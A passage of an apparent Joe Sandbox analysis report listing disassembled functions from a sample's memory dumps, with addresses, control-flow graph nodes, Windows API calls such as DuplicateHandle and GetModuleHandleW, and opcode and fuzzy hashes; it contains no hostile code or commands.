                                                                                                                                                                                                                      • Opcode ID: 0da8b1e0c8f1e1046a7d05a30bf034f2bc01bf7c8d3c4d0ee83ca68c9397058b
                                                                                                                                                                                                                      • Instruction ID: bbf2a4d4f51e74ff6cb7ba56b9487424003520c3b3819336aea4101292ae7d30
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0da8b1e0c8f1e1046a7d05a30bf034f2bc01bf7c8d3c4d0ee83ca68c9397058b
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1D41D2B0C0061DCBEB25DFA9C984BDEBBB1BF49704F20815AD508AB251DB756946CF90
                                                                                                                                                                                                                      Function 013BD7B8 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 190 13bd7b8-13bd854 DuplicateHandle 191 13bd85d-13bd87a 190->191 192 13bd856-13bd85c 190->192 192->191
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 013BD847
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.2158527518.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_13b0000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: DuplicateHandle
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3793708945-0
                                                                                                                                                                                                                      • Opcode ID: 9dfc033ea233256e44dcedb21a77a160aad80937049eeb47d2c2f8f3deafeb58
                                                                                                                                                                                                                      • Instruction ID: 15a7eb61696760b437584eda67a5146bb1a98977bc7ca3e82ae457058e930277
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9dfc033ea233256e44dcedb21a77a160aad80937049eeb47d2c2f8f3deafeb58
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4C21E3B5900249DFDB10CFAAD984AEEBFF5EB48324F14801AE959A3210D379A954CF61
                                                                                                                                                                                                                      Function 013BD7C0 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 195 13bd7c0-13bd854 DuplicateHandle 196 13bd85d-13bd87a 195->196 197 13bd856-13bd85c 195->197 197->196
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 013BD847
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.2158527518.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_13b0000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: DuplicateHandle
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3793708945-0
                                                                                                                                                                                                                      • Opcode ID: 03fdde0833f4cfa2076347eda8c0cffba00d5cae2e2dcf2f1c97809289f924d2
                                                                                                                                                                                                                      • Instruction ID: cbfcf498464f380bf87ca167678f605d3fc32d8490b57c9657570700a59a9840
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 03fdde0833f4cfa2076347eda8c0cffba00d5cae2e2dcf2f1c97809289f924d2
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8921E4B5900209DFDB10CF9AD984ADEBFF4FB48324F14801AE918A3310D378A954CFA1
                                                                                                                                                                                                                      Function 013BB4E0 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 200 13bb4e0-13bb520 201 13bb528-13bb553 GetModuleHandleW 200->201 202 13bb522-13bb525 200->202 203 13bb55c-13bb570 201->203 204 13bb555-13bb55b 201->204 202->201 204->203
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetModuleHandleW.KERNELBASE(00000000), ref: 013BB546
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.2158527518.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_13b0000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: HandleModule
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 4139908857-0
                                                                                                                                                                                                                      • Opcode ID: 71772d2d01217a746585be488e017167b3ee3b98723e946d341ea691fdfb4ff5
                                                                                                                                                                                                                      • Instruction ID: 35a54faf34559c49e00c8282c18849555fe8ce7e255b63209e8ba32cf0535a19
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 71772d2d01217a746585be488e017167b3ee3b98723e946d341ea691fdfb4ff5
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 67110FB6C00649CFDB10CF9AD444BDEFBF4AF88324F10841AD519A7600D7B9A545CFA2
                                                                                                                                                                                                                      Function 0135D3D8 Relevance: .1, Instructions: 75COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.2158063200.000000000135D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0135D000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_135d000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 962742e2a338c84b08586dd2f099f300868cace594fa8654c227e51b9520e3d0
                                                                                                                                                                                                                      • Instruction ID: a61afd68894144a6679ed3747491bf4549a29828064c164e2ec256c014607ea8
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 962742e2a338c84b08586dd2f099f300868cace594fa8654c227e51b9520e3d0
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D12148B2104204DFDB05DF44D9C0F66BF65FB84728F20C16CDD0A1B256C736E456CAA1
                                                                                                                                                                                                                      Function 0135D4C4 Relevance: .1, Instructions: 75COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.2158063200.000000000135D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0135D000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_135d000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 17334c67ef930f4f3e70bf0df8ace5ec0bf011564c7c6f538a5e38d893efb17f
                                                                                                                                                                                                                      • Instruction ID: 1e9989ba80a1ae1f4edca937b515f6df7074d597d8477d8970db07fce558649d
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 17334c67ef930f4f3e70bf0df8ace5ec0bf011564c7c6f538a5e38d893efb17f
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1D2103B2504244EFDB45DF54D9C0F26BF65FB88B1CF20C969ED090B256C336D456CAA1
                                                                                                                                                                                                                      Function 0136D1D4 Relevance: .1, Instructions: 72COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.2158151523.000000000136D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0136D000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_136d000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 7088b53acc4cd1d70f02122685b53745d5c10f857fc29176aec256a859bed818
                                                                                                                                                                                                                      • Instruction ID: d88b87a96e1adf7e9a2b005d42426887a642959ac70e64467ea4de36417c6479
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7088b53acc4cd1d70f02122685b53745d5c10f857fc29176aec256a859bed818
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 642146B1604304EFDB05DF94D9C0B26BBA9FB88328F24C56DE9894B25AC376D446CA61
                                                                                                                                                                                                                      Function 0136D01C Relevance: .1, Instructions: 72COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.2158151523.000000000136D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0136D000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_136d000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 59cc670413010a5d9951a3e1d836a4eac6112b008bca098e6cbbf9298a9437ec
                                                                                                                                                                                                                      • Instruction ID: bba0ff05100c667191f5fb3718abdb16ccbbb9c402636da513bf0f8022e32b07
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 59cc670413010a5d9951a3e1d836a4eac6112b008bca098e6cbbf9298a9437ec
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 15212275604244EFDB15DF54D9C0B26BB69FB88318F20C56DE98A0B25AC37BD407CAA1
                                                                                                                                                                                                                      Function 0135D4BF Relevance: .1, Instructions: 56COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.2158063200.000000000135D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0135D000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_135d000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: fed46cca7f742b7caa711e8ed735342f41d2c2d3303e466d284e334843d61363
                                                                                                                                                                                                                      • Instruction ID: 5f3c5f016a4ea085f8f3c7abc2c9603b295b5d4b2c92f7c9df3c97f37c18f97b
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fed46cca7f742b7caa711e8ed735342f41d2c2d3303e466d284e334843d61363
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6011AF76504284CFCB16CF54D5C4B16BF71FB84718F24C6A9DC490B656C33AD45ACBA1
                                                                                                                                                                                                                      Function 0135D3D3 Relevance: .1, Instructions: 56COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.2158063200.000000000135D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0135D000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_135d000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: fed46cca7f742b7caa711e8ed735342f41d2c2d3303e466d284e334843d61363
                                                                                                                                                                                                                      • Instruction ID: e07cfae06d6f6f0960ddcdf8f317734c571c9a56d17c4e2515b82c322c065944
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fed46cca7f742b7caa711e8ed735342f41d2c2d3303e466d284e334843d61363
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A411CDB6404280CFDB06CF44D5C0B56BF72FB84628F24C2A9DC090A256C33AE456CBA1
                                                                                                                                                                                                                      Function 0136D017 Relevance: .1, Instructions: 53COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.2158151523.000000000136D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0136D000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_136d000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 703b7abd3718bd21aa6f36dac6c8dc0e73c65716f16ca45b46755fc1987422b6
                                                                                                                                                                                                                      • Instruction ID: 0b1a41f574768af9ed012290c602e4f49b17eb9b5d54b35f78fac6b2217a51b6
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 703b7abd3718bd21aa6f36dac6c8dc0e73c65716f16ca45b46755fc1987422b6
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7811BE75604280CFCB12CF54D5C4B15BB71FB84318F24C6A9D8494B65AC33AD40ACB61
                                                                                                                                                                                                                      Function 0136D1CF Relevance: .1, Instructions: 53COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.2158151523.000000000136D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0136D000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_136d000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 703b7abd3718bd21aa6f36dac6c8dc0e73c65716f16ca45b46755fc1987422b6
                                                                                                                                                                                                                      • Instruction ID: 4b1fdab5d7cb196cc5a685ebfacf1a649ad82f68510600ea0cc67adaa95ce34a
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 703b7abd3718bd21aa6f36dac6c8dc0e73c65716f16ca45b46755fc1987422b6
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2E11BE75604280DFCB12CF54C5C4B15BB71FB84228F28C6A9D8494B256C33AD44ACB51
                                                                                                                                                                                                                      Function 0135D745 Relevance: .0, Instructions: 45COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.2158063200.000000000135D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0135D000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_135d000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 850822b7122725e74102854ac93dfff921269c3ddad8b002bf879e2eb4edfa44
                                                                                                                                                                                                                      • Instruction ID: 4c5adf95693371f953fd6f776a5da1d976d3d0d870a4bddc71b7842393382c83
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 850822b7122725e74102854ac93dfff921269c3ddad8b002bf879e2eb4edfa44
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 33012671004384DAFB509FA9CD84F67BF9CDF41B28F18C51AEE090E682D7B99841CAB1
                                                                                                                                                                                                                      Function 0135D744 Relevance: .0, Instructions: 36COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.2158063200.000000000135D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0135D000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_135d000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: faeb1b576cdad4a06e3c251fce788d1a40004f47bbfa1df4568681a672679b86
                                                                                                                                                                                                                      • Instruction ID: 0d7ed74d7d976b0a3c0a60a565713ff683515d0050ec5d6cc31cbdbe3b370c60
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: faeb1b576cdad4a06e3c251fce788d1a40004f47bbfa1df4568681a672679b86
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 01F062714053849AFB119E5ADD84B62FF98EB81638F18C45AED484A287C3799844CBB1

                                                                                                                                                                                                                      Non-executed Functions

                                                                                                                                                                                                                      Function 0548F608 Relevance: 1.4, Strings: 1, Instructions: 161COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.2162862084.0000000005480000.00000040.00000800.00020000.00000000.sdmp, Offset: 05480000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_5480000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID: sX
                                                                                                                                                                                                                      • API String ID: 0-3110708420
                                                                                                                                                                                                                      • Opcode ID: 22e8f6dd389da6616219ea80e4c9ccac11ffa536d6c8a870f0f6dbe7181294ad
                                                                                                                                                                                                                      • Instruction ID: 177744c865bc4bfbdf01ecb52398d5945856493fbd3108182f3d5ec238b0510c
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 22e8f6dd389da6616219ea80e4c9ccac11ffa536d6c8a870f0f6dbe7181294ad
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 64611670E156099FDB04CFA9C980AEEFBF2FF89210F24952AD415B7324D7349A468F64
                                                                                                                                                                                                                      Function 0548F618 Relevance: 1.4, Strings: 1, Instructions: 161COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.2162862084.0000000005480000.00000040.00000800.00020000.00000000.sdmp, Offset: 05480000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_5480000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID: sX
                                                                                                                                                                                                                      • API String ID: 0-3110708420
                                                                                                                                                                                                                      • Opcode ID: 429e65b66c4da931f1caa07a47fd1a80ccfc13742a3d95986ced442e99fc9cfd
                                                                                                                                                                                                                      • Instruction ID: b4f15daf1967f6cdde3730e00b65e55f66ee2d979c69460157d30b89708f82e9
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 429e65b66c4da931f1caa07a47fd1a80ccfc13742a3d95986ced442e99fc9cfd
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 35610270E156099FDB08CFA9C9809EEFBF2FF89210F24952AD415B7324D7349A468F64
                                                                                                                                                                                                                      Function 0548B990 Relevance: 1.4, Strings: 1, Instructions: 143COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.2162862084.0000000005480000.00000040.00000800.00020000.00000000.sdmp, Offset: 05480000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_5480000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID: V3~
                                                                                                                                                                                                                      • API String ID: 0-1917302123
                                                                                                                                                                                                                      • Opcode ID: d39ed04b4ffc37088cc30b9d5188453ec7b3983fba13d64d70f4f67d4ceee079
                                                                                                                                                                                                                      • Instruction ID: e90be8a916bd63e1ea4138d94d973ac9446cdc63a3356f641482bd98ab2ec1c5
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d39ed04b4ffc37088cc30b9d5188453ec7b3983fba13d64d70f4f67d4ceee079
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 84512974E042198FDB08DFA9D9416EEFBF2FF88300F24D56AD419B7254D7748A428BA4
                                                                                                                                                                                                                      Function 0548B980 Relevance: 1.4, Strings: 1, Instructions: 142COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.2162862084.0000000005480000.00000040.00000800.00020000.00000000.sdmp, Offset: 05480000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_5480000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID: V3~
                                                                                                                                                                                                                      • API String ID: 0-1917302123
                                                                                                                                                                                                                      • Opcode ID: 3e8001b2777e4dbceeef59a834108162ff0a616179370793954d510a27683f26
                                                                                                                                                                                                                      • Instruction ID: 04027c97de409699f6c931556b3f46252fcaeda59b5c4e63c148ccf9225b1ba8
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3e8001b2777e4dbceeef59a834108162ff0a616179370793954d510a27683f26
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 96513974E042198FDB08DFA9C9456EEFBF2FB88300F24D56AD415B7254D7748A428BA4
                                                                                                                                                                                                                      Function 0548F469 Relevance: 1.4, Strings: 1, Instructions: 109COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.2162862084.0000000005480000.00000040.00000800.00020000.00000000.sdmp, Offset: 05480000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_5480000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID: 4$VD
                                                                                                                                                                                                                      • API String ID: 0-4229505421
                                                                                                                                                                                                                      • Opcode ID: 28365710f205e66da319c93d937e135d65b55c86579b2e79bf5fb8f446725d4e
                                                                                                                                                                                                                      • Instruction ID: 70f81b63e21e2e661dae538fbabd046fbf10edd2e9b70cec5317ec3c1b7417c2
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 28365710f205e66da319c93d937e135d65b55c86579b2e79bf5fb8f446725d4e
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B841E6B0D0060A9BCB08DFAAC5816EEFBF2BF88300F14D52AD515E7254E7349A46CF95
                                                                                                                                                                                                                      Function 0548F478 Relevance: 1.4, Strings: 1, Instructions: 107COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.2162862084.0000000005480000.00000040.00000800.00020000.00000000.sdmp, Offset: 05480000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_5480000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID: 4$VD
                                                                                                                                                                                                                      • API String ID: 0-4229505421
                                                                                                                                                                                                                      • Opcode ID: 011fcb9346ba5a851864286eb15f4b6b84991b721db80363d6ea265a0c1b67dc
                                                                                                                                                                                                                      • Instruction ID: 7f322a5cc6301eef85c2a581dd9707ad75e35b4cfb94dcd7eca8ea2a79ec67c0
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 011fcb9346ba5a851864286eb15f4b6b84991b721db80363d6ea265a0c1b67dc
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9B41F7B0D0060A9BCB08DFAAC5815EEFBF2BF98300F14D52AC519E7254E7349A46CF95
                                                                                                                                                                                                                      Function 05489579 Relevance: .3, Instructions: 269COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.2162862084.0000000005480000.00000040.00000800.00020000.00000000.sdmp, Offset: 05480000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_5480000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 95df5ef89c3d7d56b6d493acb358bad1decded1aaf27bc24b15fdfb4fdaa7c5f
                                                                                                                                                                                                                      • Instruction ID: 03190a1d0aabf8796122286ebb5befc80341050f5803e6ad7ec2c92fe9e211fd
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 95df5ef89c3d7d56b6d493acb358bad1decded1aaf27bc24b15fdfb4fdaa7c5f
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3DD1E73192075ACACB05EB64D990AD9F7B1FF95300F20979AD50A77210FF706AC5CB81
                                                                                                                                                                                                                      Function 013BE12C Relevance: .3, Instructions: 264COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.2158527518.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_13b0000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 33c18b6b5d48182b39b2c8b86ced129b7e6053dc8f85309c95c828f70a157725
                                                                                                                                                                                                                      • Instruction ID: 8549cb83bade96d33a63b140c81e6eb37b643fadeefd743e2fe739c2539d654a
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 33c18b6b5d48182b39b2c8b86ced129b7e6053dc8f85309c95c828f70a157725
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3AA17132E0021A8FCF15DFB8C8805DEBBB6FF85304B254579EA01AB665EB31D955CB80
                                                                                                                                                                                                                      Function 05489588 Relevance: .3, Instructions: 264COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.2162862084.0000000005480000.00000040.00000800.00020000.00000000.sdmp, Offset: 05480000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_5480000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: b8ddc26efc623cb9c10599f17d405a46055eb930330d2bbc546ec54020052817
                                                                                                                                                                                                                      • Instruction ID: a52e3e104a0a9fd772533e1ebcac333b3204a178d992d05f9671ce3cf3db9489
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b8ddc26efc623cb9c10599f17d405a46055eb930330d2bbc546ec54020052817
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F8D1E63192075ACACB15EB64D990ADAF7B1FF95300F20979AE50A77210FF706AC5CB80
                                                                                                                                                                                                                      Function 0548E208 Relevance: .2, Instructions: 178COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.2162862084.0000000005480000.00000040.00000800.00020000.00000000.sdmp, Offset: 05480000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_5480000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 7773651359dc3358f3204d04835505b17c71b1c4c463c14b7f1b48e4adc0a0f6
                                                                                                                                                                                                                      • Instruction ID: cf1e31255c6add03bd8dc45320c371d08461845e2058366d8075084604a78a07
